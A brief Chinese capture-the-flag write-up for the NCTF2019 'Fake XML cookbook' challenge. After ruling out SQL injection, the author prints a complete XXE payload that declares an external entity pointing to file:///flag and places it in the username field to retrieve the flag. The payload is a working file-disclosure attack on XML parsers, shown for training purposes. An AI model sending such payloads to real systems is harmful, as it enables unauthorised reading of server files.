技术栈

[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

上一篇:MySQL:数据库权限与角色
下一篇:全球汽车用18650电池市场规划预测:2030年市场规模将接近320亿元,未来六年CAGR为-1.9%
相关推荐
莫陌尛.
44 分钟前
xml方式bean的配置---实例化bean的方式
xml
六元七角八分
2 天前
pom.xml
xml·数据库
郑重其事,鹏程万里
2 天前
commons-digester3(XML解析框架)
xml·java
七牛云行业应用
2 天前
实战GPT-5:用“XML三明治”和“完美循环”重构你的提示
xml·gpt·重构
跌入凡尘的张公子
2 天前
通过hutool生成xml
xml
optimistic_chen
2 天前
【Java EE进阶 --- SpringBoot】Mybatis操作数据库(基础二)
xml·数据库·spring boot·笔记·java-ee·mybatis
Lucky_Turtle
4 天前
【Java Xml】Apache Commons Digester3解析
xml·java·apache
莫陌尛.
4 天前
xml 方式声明式事务案例
xml
m0_72803313
4 天前
JavaWeb——(web.xml)中的(url-pattern)
xml·前端
有梦想的攻城狮
5 天前
Maven中的settings.xml文件配置详解
xml·java·maven·settings.xml
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05Linux下V2Ray安装配置指南06GitLab 零基础入门指南:从安装到项目管理全流程0746个Nano-banana 精选提示词,持续更新中08windows找不到gpedit.msc(本地组策略编辑器)09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)10Labelme从安装到标注:零基础完整指南